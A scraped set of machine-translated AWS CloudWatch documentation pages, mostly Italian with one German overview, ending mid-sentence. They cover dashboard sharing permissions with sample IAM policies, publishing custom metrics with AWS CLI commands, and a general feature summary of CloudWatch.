usare la documentazione AWS, JavaScript deve essere abilitato. Consulta le pagine della guida del browser per le istruzioni. Convenzioni dei documenti Esempio di evento di telemetria Nozioni di base Questa pagina ti è stata utile? - Sì Grazie per averci comunicato che stiamo facendo un buon lavoro! Se hai un momento, ti invitiamo a dirci che cosa abbiamo fatto che ti è piaciuto così possiamo offrirti altri contenuti simili. Questa pagina ti è stata utile? - No Grazie per averci comunicato che questa pagina ha bisogno di essere modificata. Siamo spiacenti di non aver soddisfatto le tue esigenze. Se hai un momento, ti invitiamo a dirci come possiamo migliorare la documentazione. | 2026-01-13T09:29:26 |
https://docs.aws.amazon.com/it_it/AmazonCloudWatch/latest/monitoring/cloudwatch-dashboard-sharing.html | CloudWatch Dashboard di condivisione - Amazon CloudWatch CloudWatch Dashboard di condivisione - Amazon CloudWatch Documentazione Amazon CloudWatch Guida per l’utente Autorizzazioni necessarie per condividere un pannello di controllo Autorizzazioni concesse agli utenti con cui condividi il pannello di controllo Consentire alle persone con cui condividi di vedere allarmi compositi Consentire alle persone con cui condividi di visualizzare i widget della tabella dei log Consentire alle persone con cui condividi di visualizzare i widget personalizzati Le traduzioni sono generate tramite traduzione automatica. In caso di conflitto tra il contenuto di una traduzione e la versione originale in Inglese, quest'ultima prevarrà. CloudWatch Dashboard di condivisione Puoi condividere le tue CloudWatch dashboard con persone che non hanno accesso diretto al tuo account. AWS In questo modo puoi condividere pannelli di controllo tra i team, con le parti interessate e con persone esterne all'organizzazione. Puoi anche visualizzare pannelli di controllo su grandi schermi nelle aree del team, o incorporarli in pagine Wiki e altre pagine Web. avvertimento A tutte le persone con cui condividi il pannello di controllo vengono concesse le autorizzazioni elencate in Autorizzazioni concesse agli utenti con cui condividi il pannello di controllo per l'account. Se condividi pubblicamente il pannello di controllo, tutti coloro che dispongono del collegamento al pannello di controllo dispongono di queste autorizzazioni. Le ec2:DescribeTags autorizzazioni cloudwatch:GetMetricData e non possono essere limitate a metriche o EC2 istanze specifiche, quindi le persone con accesso alla dashboard possono interrogare tutte le CloudWatch metriche e i nomi e i tag di tutte le istanze dell'account. EC2 Quando si condividono pannelli di controllo, è possibile specificare chi può visualizzare il pannello di controllo in tre modi: Condividi un singolo pannello di controllo e designa fino a cinque indirizzi e-mail di persone che possono visualizzare il pannello di controllo. Ognuno di questi utenti crea la propria password che deve immettere per visualizzare il pannello di controllo. Condividi pubblicamente un singolo pannello di controllo, in modo che chiunque disponga del collegamento possa visualizzarlo. Condividi tutte le CloudWatch dashboard del tuo account e specifica un provider Single Sign-On (SSO) di terze parti per l'accesso alla dashboard. Tutti gli utenti membri dell'elenco di questo provider SSO possono accedere a tutti i pannelli di controllo dell'account. Per abilitarlo, integra il provider SSO con Amazon Cognito. Il provider SSO deve supportare Security Assertion Markup Language (SAML). Per ulteriori informazioni su Amazon Cognito, consulta Che cos'è Amazon Cognito? La condivisione di una dashboard non comporta costi, ma i widget all'interno di una dashboard condivisa comportano addebiti a tariffe standard. CloudWatch Per ulteriori informazioni sui CloudWatch prezzi, consulta la pagina CloudWatch dei prezzi di Amazon . Quando condividi un pannello di controllo, le risorse di Amazon Cognito vengono create nella Regione Stati Uniti orientali (Virginia settentrionale). Importante Non modificare i nomi e gli identificatori delle risorse creati dal processo di condivisione del pannello di controllo. Ciò include le risorse Amazon Cognito e IAM. La modifica di queste risorse può causare funzionalità impreviste e non corrette dei pannelli di controllo condivisi. Nota Se condividi un pannello di controllo contenente widget parametrici con annotazioni di allarme, le persone con cui condividi il pannello di controllo non visualizzeranno tali widget. Vedranno invece un widget vuoto con un testo che indica che il widget non è disponibile. Quando visualizzi personalmente il pannello di controllo, visualizzerai comunque i widget parametrici con le annotazioni di allarme. Autorizzazioni necessarie per condividere un pannello di controllo Per poter condividere pannelli di controllo utilizzando uno dei metodi descritti di seguito e per vedere quali pannelli di controllo sono già stati condivisi, devi essere connesso come utente IAM o con un ruolo IAM che dispone di determinate autorizzazioni. Per poter condividere pannelli di controllo, l'utente o il ruolo IAM deve includere le autorizzazioni incluse nella seguente istruzione di policy: { "Effect": "Allow", "Action": [ "iam:CreateRole", "iam:CreatePolicy", "iam:AttachRolePolicy", "iam:PassRole" ], "Resource": [ "arn:aws:iam::*:role/service-role/CWDBSharing*", "arn:aws:iam::*:policy/*" ] }, { "Effect": "Allow", "Action": [ "cognito-idp:*", "cognito-identity:*", ], "Resource": [ "*" ] }, { "Effect": "Allow", "Action": [ "cloudwatch:GetDashboard", ], "Resource": [ "*" // or the ARNs of dashboards that you want to share ] } Per vedere quali pannelli di controllo sono condivisi, ma senza poterli condividere, un utente IAM o un ruolo IAM può includere un'istruzione di policy simile alla seguente: { "Effect": "Allow", "Action": [ "cognito-idp:*", "cognito-identity:*" ], "Resource": [ "*" ] }, { "Effect": "Allow", "Action": [ "cloudwatch:ListDashboards", ], "Resource": [ "*" ] } Autorizzazioni concesse agli utenti con cui condividi il pannello di controllo Quando condividi una dashboard, CloudWatch crea un ruolo IAM nell'account che concede le seguenti autorizzazioni alle persone con cui condividi la dashboard: cloudwatch:GetInsightRuleReport cloudwatch:GetMetricData cloudwatch:DescribeAlarms ec2:DescribeTags avvertimento A tutte le persone con cui condividi il pannello di controllo vengono concesse queste autorizzazioni per l'account. Se condividi pubblicamente il pannello di controllo, tutti coloro che dispongono del collegamento al pannello di controllo dispongono di queste autorizzazioni. Le ec2:DescribeTags autorizzazioni cloudwatch:GetMetricData e non possono essere limitate a metriche o EC2 istanze specifiche, quindi le persone con accesso alla dashboard possono interrogare tutte le CloudWatch metriche e i nomi e i tag di tutte le istanze dell'account. EC2 Quando condividi una dashboard, per impostazione predefinita le autorizzazioni CloudWatch create limitano l'accesso solo agli allarmi e alle regole di Contributor Insights presenti nella dashboard quando è condivisa. Se si aggiungono nuovi avvisi o regole di Contributor Insights dei collaboratori al pannello di controllo e si desidera che vengano visualizzati anche dagli utenti con cui è stato condiviso il pannello di controllo, devi aggiornare la policy per consentire queste risorse. Consentire alle persone con cui condividi di vedere allarmi compositi Quando condividi un pannello di controllo, per impostazione predefinita i widget di allarme composito sul pannello di controllo non sono visibili agli utenti con cui si condivide il pannello di controllo. Affinché i widget di allarme composito siano visibili, devi aggiungere un'autorizzazione DescribeAlarms: * alle policy di condivisione del pannello di controllo. L'autorizzazione avrebbe il seguente aspetto: { "Effect": "Allow", "Action": "cloudwatch:DescribeAlarms", "Resource": "*" } avvertimento L'istruzione precedente offre l'accesso a tutti gli allarmi presenti nell'account. Per ridurre l'ambito di cloudwatch:DescribeAlarms , devi utilizzare un'istruzione Deny . Puoi aggiungere una Deny dichiarazione alla politica e specificare gli ARNs allarmi che desideri bloccare. Questa istruzione di negazione dovrebbe essere simile alla seguente: { "Effect": "Allow", "Action": "cloudwatch:DescribeAlarms", "Resource": "*" }, { "Effect": "Deny", "Action": "cloudwatch:DescribeAlarms", "Resource": [ "SensitiveAlarm1ARN", "SensitiveAlarm1ARN" ] } Consentire alle persone con cui condividi di visualizzare i widget della tabella dei log Quando condividi una dashboard, per impostazione predefinita i widget di CloudWatch Logs Insights presenti nella dashboard non sono visibili alle persone con cui condividi la dashboard. Ciò influisce sia sui widget di CloudWatch Logs Insights esistenti sia su quelli aggiunti alla dashboard dopo la condivisione. Se vuoi che queste persone possano vedere CloudWatch i widget di Logs, devi aggiungere le autorizzazioni al ruolo IAM per la condivisione della dashboard. Per consentire alle persone con cui condividi una dashboard di visualizzare i widget Logs CloudWatch Apri la CloudWatch console all'indirizzo. https://console.aws.amazon.com/cloudwatch/ Nel pannello di navigazione seleziona Dashboards (Pannelli di controllo). Scegli il nome del pannello di controllo condiviso. Scegli Actions (Operazioni), Share dashboard (Condividi pannello di controllo). In Resources (Risorse), scegli IAM Role (Ruolo IAM). Nella console IAM, scegli la policy visualizzata. Scegli Edit policy (Modifica policy) e aggiungi la seguente istruzione. Nella nuova dichiarazione, ti consigliamo di specificare solo i gruppi ARNs di log che desideri condividere. Guarda l'esempio seguente. { "Effect": "Allow", "Action": [ "logs:FilterLogEvents", "logs:StartQuery", "logs:StopQuery", "logs:GetLogRecord", "logs:DescribeLogGroups" ], "Resource": [ " SharedLogGroup1ARN ", " SharedLogGroup2ARN " ] }, Seleziona Salva modifiche . Se la tua policy IAM per la condivisione della dashboard include già quelle cinque autorizzazioni * come risorsa, ti consigliamo vivamente di modificare la policy e specificare solo i gruppi ARNs di log che desideri condividere. Ad esempio, se la sezione Resource per queste autorizzazioni era la seguente: "Resource": "*" Modifica la policy per specificare solo i gruppi ARNs di log che desideri condividere, come nell'esempio seguente: "Resource": [ " SharedLogGroup1ARN ", " SharedLogGroup2ARN " ] Consentire alle persone con cui condividi di visualizzare i widget personalizzati Quando condividi un pannello di controllo, per impostazione predefinita i widget personalizzati presenti nel pannello di controllo non sono visibili agli utenti con cui condividi il pannello di controllo. Ciò influisce sia sui widget personalizzati esistenti che su quelli aggiunti al pannello di controllo dopo la condivisione. Se desideri che queste persone siano in grado di visualizzare widget personalizzati, devi aggiungere autorizzazioni al ruolo IAM per la condivisione del pannello di controllo. Per consentire agli utenti con cui condividi un pannello di controllo di visualizzare i widget personalizzati Apri la CloudWatch console all'indirizzo https://console.aws.amazon.com/cloudwatch/ . Nel pannello di navigazione seleziona Dashboards (Pannelli di controllo). Scegli il nome del pannello di controllo condiviso. Scegli Actions (Operazioni), Share dashboard (Condividi pannello di controllo). In Resources (Risorse), scegli IAM Role (Ruolo IAM). Nella console IAM, scegli la policy visualizzata. Scegli Edit policy (Modifica policy) e aggiungi la seguente istruzione. Nella nuova dichiarazione, ti consigliamo ARNs di specificare solo le funzioni Lambda che desideri condividere. Guarda l'esempio seguente. { "Sid": "Invoke", "Effect": "Allow", "Action": [ "lambda:InvokeFunction" ], "Resource": [ "LambdaFunction1ARN", "LambdaFunction2ARN" ] } Seleziona Salva modifiche . Se la tua policy IAM per la condivisione della dashboard include già tale autorizzazione * come risorsa, ti consigliamo vivamente ARNs di modificare la policy e specificare solo le funzioni Lambda che desideri condividere. Ad esempio, se la sezione Resource per queste autorizzazioni era la seguente: "Resource": "*" Modifica la policy per specificare solo ARNs i widget personalizzati che desideri condividere, come nell'esempio seguente: "Resource": [ " LambdaFunction1ARN ", " LambdaFunction2ARN " ] JavaScript è disabilitato o non è disponibile nel tuo browser. Per usare la documentazione AWS, JavaScript deve essere abilitato. Consulta le pagine della guida del browser per le istruzioni. Convenzioni dei documenti Scollegamento di grafici Condivisione di un pannello di controllo con utenti specifici Questa pagina ti è stata utile? - Sì Grazie per averci comunicato che stiamo facendo un buon lavoro! Se hai un momento, ti invitiamo a dirci che cosa abbiamo fatto che ti è piaciuto così possiamo offrirti altri contenuti simili. Questa pagina ti è stata utile? - No Grazie per averci comunicato che questa pagina ha bisogno di essere modificata. Siamo spiacenti di non aver soddisfatto le tue esigenze. Se hai un momento, ti invitiamo a dirci come possiamo migliorare la documentazione. | 2026-01-13T09:29:26 |
https://docs.aws.amazon.com/it_it/AmazonCloudWatch/latest/monitoring/publishingMetrics.html | Publish custom metrics - Amazon CloudWatch Publish custom metrics - Amazon CloudWatch Documentazione Amazon CloudWatch Guida per l’utente Parametri ad alta risoluzione Utilizzo delle dimensioni Pubblicazione di singoli punti dati Pubblicazione di set di statistiche Pubblicazione del valore zero Interrompi i parametri di pubblicazione Le traduzioni sono generate tramite traduzione automatica. In caso di conflitto tra il contenuto di una traduzione e la versione originale in Inglese, quest'ultima prevarrà. Publish custom metrics Puoi pubblicare le tue metriche CloudWatch utilizzando AWS CLI o un'API. Puoi visualizzare grafici statistici delle metriche pubblicate con. Console di gestione AWS CloudWatch archivia i dati relativi a una metrica come una serie di punti dati. Ogni punto dati viene associato a un timestamp. Puoi inoltre pubblicare un set aggregato di punti di dati denominato set di statistiche . Argomenti Parametri ad alta risoluzione Utilizzo delle dimensioni Pubblicazione di singoli punti dati Pubblicazione di set di statistiche Pubblicazione del valore zero Interrompi i parametri di pubblicazione Parametri ad alta risoluzione Ogni parametro appartiene a una delle seguenti categorie: Risoluzione standard, con dati aventi una granularità di un minuto Alta risoluzione, con dati aventi una granularità di un secondo Per impostazione predefinita, le metriche prodotte dai AWS servizi hanno una risoluzione standard. Quando pubblichi un parametro personalizzato, puoi definirlo sia come risoluzione standard che come alta risoluzione. Quando pubblichi una metrica ad alta risoluzione, la CloudWatch archivia con una risoluzione di 1 secondo e puoi leggerla e recuperarla con un periodo di 1 secondo, 5 secondi, 10 secondi, 30 secondi o qualsiasi multiplo di 60 secondi. I parametri ad alta risoluzione ti offrono un'analisi più immediata sull'attività inferiore al minuto dell'applicazione. Tieni presente che ogni chiamata PutMetricData per un parametro personalizzato viene addebitata, quindi frequenti chiamate a PutMetricData su un parametro ad alta risoluzione potrebbero portare a costi più elevati. Per ulteriori informazioni sui CloudWatch prezzi, consulta la pagina CloudWatch dei prezzi di Amazon . Se imposti un allarme su un parametro ad alta risoluzione, puoi specificare un allarme ad alta risoluzione con un periodo di 10 secondi o 30 secondi, oppure puoi impostare un allarme regolare con un periodo di qualsiasi multiplo di più di 60 secondi. Viene addebitato un costo maggiore per gli allarmi ad alta risoluzione con un periodo di 10 o 30 secondi. Utilizzo delle dimensioni Nei parametri personalizzati, il parametro --dimensions è comune. Una dimensione chiarisce ulteriormente le caratteristiche del parametro e i dati archiviati. Puoi avere un massimo di 30 dimensioni assegnate a un parametro, ognuna delle quali è definita da una coppia formata da nome e valore. Il modo in cui si specifica una dimensione è diverso quando utilizzi comandi differenti. Con put-metric-data , specifichi ogni dimensione come MyName = MyValue e con get-metric-statistics o put-metric-alarm usi il formato Name= MyName , Value= MyValue . Ad esempio, il seguente comando consente di pubblicare un parametro Buffers con due dimensioni denominate InstanceId e InstanceType . aws cloudwatch put-metric-data --metric-name Buffers --namespace MyNameSpace --unit Bytes --value 231434333 --dimensions InstanceId=1-23456789,InstanceType=m1.small Questo comando recupera le statistiche per quello stesso parametro. Separa con virgole le parti di Nome e Valore di una singola dimensione, ma utilizza uno spazio tra una dimensione e quella successiva se disponi di più dimensioni. aws cloudwatch get-metric-statistics --metric-name Buffers --namespace MyNameSpace --dimensions Name=InstanceId,Value=1-23456789 Name=InstanceType,Value=m1.small --start-time 2016-10-15T04:00:00Z --end-time 2016-10-19T07:00:00Z --statistics Average --period 60 Se una singola metrica include più dimensioni, è necessario specificare un valore per ogni dimensione definita quando si utilizza get-metric-statistics . Ad esempio, la metrica di Amazon S3 BucketSizeBytes include le dimensioni BucketName e StorageType , pertanto, è necessario specificare entrambe le dimensioni con. get-metric-statistics aws cloudwatch get-metric-statistics --metric-name BucketSizeBytes --start-time 2017-01-23T14:23:00Z --end-time 2017-01-26T19:30:00Z --period 3600 --namespace AWS/S3 --statistics Maximum --dimensions Name=BucketName,Value= amzn-s3-demo-bucket Name=StorageType,Value=StandardStorage --output table Per visualizzare le dimensioni definite per un parametro, è disponibile il comando list-metrics . Pubblicazione di singoli punti dati Per pubblicare un singolo punto dati per una metrica nuova o esistente, usa il put-metric-data comando con un valore e un timestamp. Ad esempio, ciascuna delle seguenti operazioni pubblica un punto dati. aws cloudwatch put-metric-data --metric-name PageViewCount --namespace MyService --value 2 --timestamp 2016-10-20T12:00:00.000Z aws cloudwatch put-metric-data --metric-name PageViewCount --namespace MyService --value 4 --timestamp 2016-10-20T12:00:01.000Z aws cloudwatch put-metric-data --metric-name PageViewCount --namespace MyService --value 5 --timestamp 2016-10-20T12:00:02.000Z Se chiami questo comando con un nuovo nome di metrica, CloudWatch crea una metrica per te. Altrimenti, CloudWatch associa i tuoi dati alla metrica esistente che hai specificato. Nota Quando crei una metrica, possono essere necessari fino a 2 minuti prima di poter recuperare le statistiche per la nuova metrica utilizzando il comando. get-metric-statistics Tuttavia, possono essere necessari fino a 15 minuti prima che il nuovo parametro venga visualizzato nell'elenco di quelli recuperati tramite il comando list-metrics . Sebbene sia possibile pubblicare punti dati con timestamp granulari fino a un millesimo di secondo, CloudWatch aggrega i dati con una granularità minima di 1 secondo. CloudWatch registra la media (somma di tutti gli elementi divisa per il numero di elementi) dei valori ricevuti per ogni periodo, nonché il numero di campioni, il valore massimo e il valore minimo per lo stesso periodo di tempo. Ad esempio, il parametro PageViewCount degli esempi precedenti contiene tre punti di dati con timestamp distanti di pochi secondi. Se il periodo è impostato su 1 minuto, CloudWatch aggrega i tre punti dati perché hanno tutti un timestamp entro un periodo di 1 minuto. Puoi utilizzare il comando get-metric-statistics per recuperare le statistiche in base ai punti dati pubblicati. aws cloudwatch get-metric-statistics --namespace MyService --metric-name PageViewCount \ --statistics "Sum" "Maximum" "Minimum" "Average" "SampleCount" \ --start-time 2016-10-20T12:00:00.000Z --end-time 2016-10-20T12:05:00.000Z --period 60 Di seguito è riportato un output di esempio. { "Datapoints": [ { "SampleCount": 3.0, "Timestamp": "2016-10-20T12:00:00Z", "Average": 3.6666666666666665, "Maximum": 5.0, "Minimum": 2.0, "Sum": 11.0, "Unit": "None" } ], "Label": "PageViewCount" } Pubblicazione di set di statistiche Puoi aggregare i dati prima di pubblicarli su. CloudWatch Quando sono presenti più punti dati al minuto, l'aggregazione dei dati riduce al minimo il numero di chiamate a put-metric-data . Ad esempio, invece di chiamare più volte put-metric-data per tre punti dati a distanza di 3 secondi l'uno dall'altro, è possibile aggregare i dati in un set di statistiche da pubblicare con un'unica chiamata, tramite il parametro --statistic-values . aws cloudwatch put-metric-data --metric-name PageViewCount --namespace MyService --statistic-values Sum=11,Minimum=2,Maximum=5,SampleCount=3 --timestamp 2016-10-14T12:00:00.000Z CloudWatch necessita di punti dati grezzi per calcolare i percentili. Se pubblichi dati utilizzando un set di statistiche, invece, non potrai recuperarne le relative statistiche dei percentili, a meno che non si verifichi una delle seguenti condizioni: Il SampleCount del set di statistiche è 1 I valori Minimum e Maximum del set di statistiche sono uguali Pubblicazione del valore zero Quando i tuoi dati sono più sporadici e sono presenti periodi senza dati associati, puoi scegliere di pubblicare il valore zero ( 0 ) per tale periodo oppure nessun valore. Se utilizzi chiamate periodiche a PutMetricData per monitorare lo stato delle applicazioni, potresti voler pubblicare zero invece di nessun valore. Ad esempio, puoi impostare un allarme CloudWatch per ricevere una notifica se l'applicazione non pubblica parametri ogni cinque minuti. Desideri che tale applicazione pubblichi valori zero per i periodi senza dati associati. Puoi inoltre pubblicare valori zero se intendi monitorare il numero totale di punti di dati o se desideri che le statistiche di tipo minima e media includano i punti di dati con il valore 0. Interrompi i parametri di pubblicazione Per interrompere la pubblicazione di metriche personalizzate su CloudWatch, modifica il codice dell'applicazione o del servizio in modo che interrompa l'utilizzo. PutMetricData CloudWatch non estrae metriche dalle applicazioni, riceve solo ciò che gli viene inviato, quindi per interrompere la pubblicazione delle metriche è necessario interromperle alla fonte. JavaScript è disabilitato o non è disponibile nel tuo browser. Per usare la documentazione AWS, JavaScript deve essere abilitato. Consulta le pagine della guida del browser per le istruzioni. Convenzioni dei documenti Aggregazione di statistiche per AMI Allarmi Questa pagina ti è stata utile? - Sì Grazie per averci comunicato che stiamo facendo un buon lavoro! Se hai un momento, ti invitiamo a dirci che cosa abbiamo fatto che ti è piaciuto così possiamo offrirti altri contenuti simili. Questa pagina ti è stata utile? - No Grazie per averci comunicato che questa pagina ha bisogno di essere modificata. Siamo spiacenti di non aver soddisfatto le tue esigenze. Se hai un momento, ti invitiamo a dirci come possiamo migliorare la documentazione. | 2026-01-13T09:29:26 |
https://docs.aws.amazon.com/de_de/AmazonCloudWatch/latest/monitoring/WhatIsCloudWatch.html#BillingPointer | Was ist Amazon CloudWatch? - Amazon CloudWatch Was ist Amazon CloudWatch? - Amazon CloudWatch Dokumentation Amazon CloudWatch Benutzer-Leitfaden Betriebliche Transparenz mit Metriken, Alarmen und Dashboards Application Performance Monitoring (APM) Überwachung der Infrastruktur Protokolle sammeln, speichern und abfragen Verwenden Sie den CloudWatch Agenten, um Metriken, Protokolle und Traces von EC2 Amazon-Flotten zu sammeln Kontoübergreifende Überwachung Lösungskatalog CloudWatch Netzwerk-Überwachung Fakturierung und Kosten Ressourcen Die vorliegende Übersetzung wurde maschinell erstellt. Im Falle eines Konflikts oder eines Widerspruchs zwischen dieser übersetzten Fassung und der englischen Fassung (einschließlich infolge von Verzögerungen bei der Übersetzung) ist die englische Fassung maßgeblich. Was ist Amazon CloudWatch? Amazon CloudWatch überwacht Ihre Amazon Web Services (AWS) -Ressourcen und die Anwendungen, auf denen Sie laufen, AWS in Echtzeit und bietet zahlreiche Tools, mit denen Sie die Leistung, den Betriebszustand und die Ressourcennutzung Ihrer Anwendungen systemweit beobachten können. Themen Betriebliche Transparenz mit Metriken, Alarmen und Dashboards Application Performance Monitoring (APM) Überwachung der Infrastruktur Protokolle sammeln, speichern und abfragen Verwenden Sie den CloudWatch Agenten, um Metriken, Protokolle und Traces von EC2 Amazon-Flotten zu sammeln Kontoübergreifende Überwachung Lösungskatalog Netzwerk- und Internetüberwachung Fakturierung und Kosten CloudWatch Amazon-Ressourcen Betriebliche Transparenz mit Metriken, Alarmen und Dashboards Metriken erfassen und verfolgen wichtige Leistungsdaten in benutzerdefinierten Intervallen. Viele AWS Dienste melden Metriken automatisch an CloudWatch, und Sie können auch benutzerdefinierte Messwerte in CloudWatch Ihren Anwendungen veröffentlichen . Dashboards bieten eine einheitliche Ansicht Ihrer Ressourcen und Anwendungen mit Visualisierungen Ihrer Metriken und Protokolle an einem einzigen Ort. Sie können Dashboards auch konten- und regionsübergreifend teilen , um den Überblick über Ihre Abläufe zu verbessern. CloudWatch bietet kuratierte automatische Dashboards für viele AWS Dienste, sodass Sie sie nicht selbst erstellen müssen. Sie können Alarme einrichten, die Messwerte kontinuierlich anhand benutzerdefinierter CloudWatch Schwellenwerte überwachen. Sie können Sie automatisch vor Überschreitungen der Schwellenwerte warnen und auch automatisch auf Änderungen im Verhalten Ihrer Ressourcen reagieren, indem sie automatisierte Aktionen auslösen . Application Performance Monitoring (APM) Mit Application Signals können Sie die wichtigsten Leistungsindikatoren Ihrer Anwendungen wie Latenz, Fehlerraten und Anforderungsraten automatisch erkennen und überwachen, ohne dass manuelle Instrumentierung oder Codeänderungen erforderlich sind. Application Signals bietet auch kuratierte Dashboards, sodass Sie mit einem Minimum an Einrichtung mit der Überwachung beginnen können. CloudWatch Synthetics ergänzt dies, indem es Ihnen ermöglicht, Ihre Endgeräte proaktiv zu überwachen und APIs konfigurierbare Skripts, sogenannte Canaries , zu verwenden, die das Benutzerverhalten simulieren und Sie auf Verfügbarkeitsprobleme oder Leistungseinbußen aufmerksam machen, bevor sie sich auf echte Benutzer auswirken. Sie können CloudWatch RUM auch verwenden, um Leistungsdaten aus echten Benutzersitzungen zu sammeln. Verwenden Sie Service Level Objectives (SLOs) , CloudWatch um spezifische Zuverlässigkeitsziele für Ihre Anwendungen zu definieren, nachzuverfolgen und entsprechende Warnmeldungen zu erstellen. So können Sie Ihre Verpflichtungen zur Servicequalität einhalten, indem Sie Fehlerbudgets festlegen und die SLO-Einhaltung im Laufe der Zeit überwachen. Überwachung der Infrastruktur Viele AWS Dienste senden grundlegende Kennzahlen automatisch und CloudWatch kostenlos an. Services, die Metriken senden, sind hier aufgelistet . Darüber hinaus CloudWatch bietet es zusätzliche Überwachungsfunktionen für mehrere wichtige Teile der AWS Infrastruktur: Mit Database Insights können Sie die Leistungsmetriken von Datenbanken in Echtzeit überwachen, die Leistung von SQL-Abfragen analysieren und Probleme beim Laden von Datenbanken für AWS -Datenbankservices beheben. Lambda Insights bietet Metriken auf Systemebene für Lambda-Funktionen, darunter die Überwachung der Speicher- und CPU-Auslastung sowie die Erkennung und Analyse von Kaltstarts. Mit Container Insights können Sie Metriken aus containerisierten Anwendungen auf Amazon ECS-Clustern, Amazon EKS-Clustern und selbstverwalteten Kubernetes-Clustern auf Amazon sammeln und analysieren. EC2 Protokolle sammeln, speichern und abfragen CloudWatch Logs bietet eine Reihe leistungsstarker Funktionen für eine umfassende Protokollverwaltung und -analyse. Von AWS Diensten und benutzerdefinierten Anwendungen aufgenommene Protokolle werden zur einfachen Organisation in Protokollgruppen und Streams gespeichert. Verwenden Sie CloudWatch Logs Insights , um interaktive, schnelle Abfragen Ihrer Protokolldaten durchzuführen. Sie haben die Wahl zwischen drei Abfragesprachen, darunter SQL und PPL. Verwenden Sie die Erkennung von Protokollausreißern , um ungewöhnliche Muster in Protokollereignissen in einer Protokollgruppe zu finden, die auf Probleme hinweisen können. Erstellen Sie Metrikfilter , um numerische Werte aus Protokollen zu extrahieren und CloudWatch Metriken zu generieren, die Sie für Benachrichtigungen und Dashboards verwenden können. Richten Sie Abonnementfilter ein, um Protokolle in Echtzeit zu verarbeiten und zu analysieren oder sie an andere Services wie Amazon S3 oder Firehose weiterzuleiten. Verwenden Sie den CloudWatch Agenten, um Metriken, Protokolle und Traces von EC2 Amazon-Flotten zu sammeln Verwenden Sie den CloudWatch Agenten , um detaillierte Systemmetriken zu Prozessen, CPU, Arbeitsspeicher, Festplattennutzung und Netzwerkleistung von Ihren Flotten von EC2 Amazon-Instances und lokalen Servern zu sammeln. Sie können auch benutzerdefinierte Metriken aus Ihren Anwendungen sammeln und überwachen, Protokolle aus mehreren Quellen zusammenfassen und Alarme auf der Grundlage der gesammelten Daten konfigurieren. Sie können den Agenten auch verwenden, um GPU-Metriken zu sammeln. Der Agent unterstützt sowohl Windows- als auch Linux-Betriebssysteme und kann zur zentralen Konfigurationsverwaltung in Systems Manager integriert werden. Kontoübergreifende Überwachung CloudWatch Mit der kontenübergreifenden Observability können Sie ein zentrales Überwachungskonto einrichten, um Anwendungen zu überwachen und Fehler zu beheben, die sich über mehrere Konten erstrecken. Über das zentrale Konto können Sie Metriken, Protokolle und Ablaufverfolgungen von Quellkonten in Ihrer gesamten Organisation einsehen. Dieser zentralisierte Ansatz ermöglicht es Ihnen, kontenübergreifende Dashboards zu erstellen, Alarme einzurichten, die Metriken mehrerer Konten zu überwachen, und Ursachenanalysen über Kontogrenzen hinweg durchzuführen. Mit der CloudWatch kontenübergreifenden Observability können Sie Quellkonten entweder einzeln oder automatisch miteinander verknüpfen. AWS Organizations Lösungskatalog CloudWatch bietet einen Katalog leicht verfügbarer Konfigurationen, mit denen Sie schnell die Überwachung verschiedener AWS Dienste und gängiger Workloads wie Java Virtual Machines (JVM), NVIDIA GPU, Apache Kafka, Apache Tomcat und NGINX implementieren können. Diese Lösungen bieten gezielte Anleitungen, einschließlich Anweisungen zur Installation und Konfiguration des CloudWatch Agenten, zur Bereitstellung vordefinierter benutzerdefinierter Dashboards und zur Einrichtung entsprechender Alarme. Netzwerk- und Internetüberwachung CloudWatch bietet umfassende Netzwerk- und Internetüberwachungsfunktionen über CloudWatch Network Monitoring. Internet Monitor verwendet AWS globale Netzwerkdaten, um die Internetleistung und Verfügbarkeit zwischen Ihren Anwendungen und Endbenutzern zu analysieren. Mit einem Internetmonitor können Sie erhöhte Latenzzeiten oder regionale Störungen, die sich auf Ihre Kunden auswirken, erkennen oder Benachrichtigungen erhalten. Internetmonitore analysieren Ihre VPC-Flussprotokolle, um automatisierte Einblicke in die Muster und die Leistung des Netzwerkverkehrs zu erhalten. Sie können ebenfalls Vorschläge dazu erhalten, wie Sie die Anwendungsleistung für Ihre Clients optimieren können. Network Flow Monitor zeigt Informationen zur Netzwerkleistung an, die von einfachen Softwareagenten gesammelt wurden, die Sie auf Ihren Instances installieren. Mithilfe eines Flow Monitors können Sie schnell den Paketverlust und die Latenz Ihrer Netzwerkverbindungen über einen von Ihnen festgelegten Zeitraum visualisieren. Jeder Monitor generiert außerdem einen Netzwerkstatusindikator (Network Health Indicator, NHI), der Ihnen mitteilt, ob während des von Ihnen untersuchten Zeitraums AWS Netzwerkprobleme bei den Netzwerkströmen aufgetreten sind, die von Ihrem Monitor aufgezeichnet wurden. Wenn Sie eine Verbindung herstellen Direct Connect, können Sie synthetische Monitore in Network Synthetic Monitor verwenden, um die Netzwerkkonnektivität proaktiv zu überwachen, indem Sie synthetische Tests zwischen einer VPC und lokalen Endpunkten ausführen. Wenn Sie einen synthetischen Monitor erstellen, geben Sie Tests an, indem Sie ein VPC-Subnetz und lokale IP-Adressen angeben. AWS erstellt und verwaltet die Infrastruktur im Hintergrund, die für die Durchführung von Messungen der Umlaufzeit und des Paketverlusts mit den Sonden erforderlich ist. Diese Tests erkennen Probleme mit Konnektivität, DNS und Latenz, bevor sie sich auf Ihre Anwendungen auswirken, sodass Sie Maßnahmen ergreifen können, um die Erfahrung Ihrer Endbenutzer zu verbessern. Fakturierung und Kosten Vollständige Informationen zu den CloudWatch Preisen finden Sie unter CloudWatch Amazon-Preise . Informationen, die Ihnen helfen können, Ihre Rechnung zu analysieren und möglicherweise Kosten zu optimieren und zu senken, finden Sie unter CloudWatch Kosten analysieren, optimieren und reduzieren . CloudWatch Amazon-Ressourcen Die folgenden verwandten Ressourcen bieten Ihnen nützliche Informationen für die Arbeit mit diesem Service. Ressource Description Amazon CloudWatch FAQs Die Webseite „Häufig gestellte Fragen” deckt alle wichtigsten Fragen ab, die Entwickler zu diesem Produkt gestellt haben. AWS Entwicklerzentrum Ein zentraler Ausgangspunkt, um Dokumentation, Codebeispiele, Versionshinweise und andere Informationen zu finden, mit denen Sie innovative Anwendungen entwickeln können AWS. AWS-Managementkonsole Mit der Konsole können Sie die meisten Funktionen von Amazon CloudWatch und verschiedenen anderen AWS Angeboten ohne Programmierung ausführen. CloudWatch Amazon-Diskussionsforen Community-basiertes Forum für Entwickler zur Diskussion technischer Fragen zu Amazon. CloudWatch AWS Support Die zentrale Anlaufstelle für die Erstellung und Verwaltung Ihrer AWS Support Fälle. Enthält auch Links zu anderen hilfreichen Ressourcen wie Foren, technischen InformationenFAQs, Servicestatus und AWS Trusted Advisor. CloudWatch Amazon-Produktinformationen Die primäre 